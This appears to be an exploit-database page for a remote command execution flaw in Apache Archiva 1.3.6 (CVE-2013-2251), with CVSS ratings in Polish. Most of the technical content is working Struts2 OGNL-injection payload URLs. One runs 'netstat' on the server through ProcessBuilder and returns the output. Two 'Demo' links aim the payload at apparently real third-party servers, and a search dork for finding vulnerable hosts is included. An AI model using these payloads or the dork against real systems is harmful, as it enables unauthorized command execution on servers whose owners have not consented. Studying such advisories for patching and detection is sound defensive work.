Apache Archiva 1.3.6 => Remote Command Execution 0day

2014-01-14 / 2014-01-15

Credit: Kacper

Risk: High

Local: No

Remote: Yes

CVE: CVE-2013-2251

CWE: N/A

Dork: \"Apache Archiva \\ Browse Repository\"

Ogólna skala CVSS: 9.3/10

Znaczenie: 10/10

Łatwość wykorzystania: 8.6/10

Wymagany dostęp: Zdalny

Złożoność ataku: Średnia

Autoryzacja: Nie wymagana

Wpływ na poufność: Pełny

Wpływ na integralność: Pełny

Wpływ na dostępność: Pełny

Apache Archiva 1.3.6 => Remote Command Execution
####################################################################
Author: Kacper
Contact: info[at]devilteam.pl
Home Page: https://devilteam.pl/
####################################################################
Vendor: http://archiva.apache.org/
Dork: "Apache Archiva \ Browse Repository"
Description:
Apache Archiva use Apache Struts2:
"In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code."
In Apache Archiva can be use parameter redirect: for OGNL injection.
PoC:
(print devilteam.pl) http://imageshack.com/a/img163/6865/e88n.png
http://127.0.0.1:8080/archiva/security/login.action?redirect:${%23w%3d%23context.get%28%27
com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println
%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}
{execute netstat) http://imageshack.com/a/img843/1662/0r84.png
http://127.0.0.1:8080/archiva/security/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder
%28new%20java.lang.String[]{%27netstat%27}%29%29.start%28%29,%23b%3d%23a.
getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,
%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],
%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2
.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,
%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}
Demo:
http://archiva.eionet.eurXpa.eu/security/login.action?redirect:${%23w%3d%23context.get
%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter
%28%29,%23w.println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}
http://community.ucs.indiXna.edu:9090/archiva/security/login.action?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.
println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}
Cheers:
cxsecurity.com
Bartek (ZUOO)
and all people from devilteam.pl
Reference:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
https://devilteam.pl/viewtopic.php?p=43506

Referencje:

https://devilteam.pl/viewtopic.php?p=43506

http://struts.apache.org/release/2.3.x/docs/s2-016.html

http://imageshack.com/a/img163/6865/e88n.png

http://imageshack.com/a/img843/1662/0r84.png

http://seclists.org/oss-sec/2014/q1/87

http://devilteam.pl/

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Apache Archiva 1.3.6 => Remote Command Execution 0day

Dork: \"Apache Archiva \\ Browse Repository\"

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.